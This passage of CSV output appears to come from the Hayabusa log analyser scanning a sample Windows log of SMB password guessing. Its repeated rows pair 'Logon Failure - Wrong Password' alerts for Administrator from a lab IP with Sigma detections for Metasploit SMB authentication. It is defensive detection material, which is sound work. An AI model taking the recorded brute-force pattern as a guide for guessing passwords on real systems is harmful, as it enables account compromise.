NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
